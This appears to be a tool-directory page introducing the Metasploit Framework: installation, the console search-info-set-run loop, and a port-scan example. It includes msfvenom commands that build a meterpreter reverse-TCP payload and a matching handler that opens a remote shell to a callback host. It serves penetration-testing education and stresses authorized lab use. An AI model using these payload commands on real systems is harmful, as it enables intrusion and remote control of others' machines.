Exploit BSD-3-Clause for the Framework Linux, macOS, Windows

Metasploit

Framework of modules, payloads and post-exploitation tools behind one console.

>_ Official sitemetasploit.com Visit

Metasploit is an exploitation framework that puts scanners, exploits, payloads and post-exploitation modules behind one console. Every module lists its options and the conditions it needs, so in a lab you can reproduce a known issue end to end and read the code behind it. This page covers installing the Framework, the console loop you repeat on every module, and building a payload with msfvenom.

Scope

Use it only on systems you own or are authorized to test.

Installing Metasploit

Use the official Rapid7 installer so your module set and payloads are current and trustworthy. On Kali the framework is already packaged.

bash
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall && ./msfinstall
sudo apt install metasploit-framework   # Kali

Your first module

Open the console with msfconsole. The loop is always the same: search for a module, read its info, set its options, and run. Reading before running keeps you out of trouble.

msfconsole
msf6 > search type:auxiliary portscan
#  Name                             Rank    Description
0  auxiliary/scanner/portscan/tcp   normal  TCP Port Scanner
msf6 > use auxiliary/scanner/portscan/tcp
msf6 > info

search finds a module, use selects it, and info states in plain terms what it does and what it touches. You never fire something you have not read.

The console loop

With a module selected, set its options, confirm with show options that nothing is missing, and run it.

bash
msf6 > use auxiliary/scanner/portscan/tcp
msf6 > set RHOSTS 10.0.0.5
msf6 > show options
msf6 > run
CommandWhat it does
searchFind modules by name, type, platform or CVE
use / infoSelect a module, and read what it does
set / setgSet an option, or a global that persists
show optionsList what a module still needs
run / exploitLaunch the module
sessions -i NInteract with session number N

Payloads with msfvenom and a handler

msfvenom builds a standalone payload in any format a lab needs, with the callback host and port baked in. You then start a matching handler so the framework is listening when the payload runs. The payload and handler must agree on type, host and port, or the session never lands.

bash
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o shell.elf
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 10.0.0.1; set LPORT 4444; run"

Meterpreter and sessions

A successful payload gives you a session. Meterpreter is the feature-rich one: it runs in memory and gives file access, process control and pivoting over one encrypted channel. List sessions with sessions -l, background one, and the post modules then automate enumeration of the host.

Next step

Practise the whole loop against a vulnerable VM such as Metasploitable. Read info on every module first, so you always know what it touches.

Install

shell
# official installer (Linux, macOS)
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall && ./msfinstall
sudo apt install metasploit-framework   # Kali

Example

shell
# search for a module, then read it before running
msfconsole -q -x "search type:auxiliary portscan; info auxiliary/scanner/portscan/tcp"

# build a standalone payload with msfvenom
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o shell.elf
Authorized use only

Run this against your own lab or systems you have written permission to test — nothing else.

used in these writeups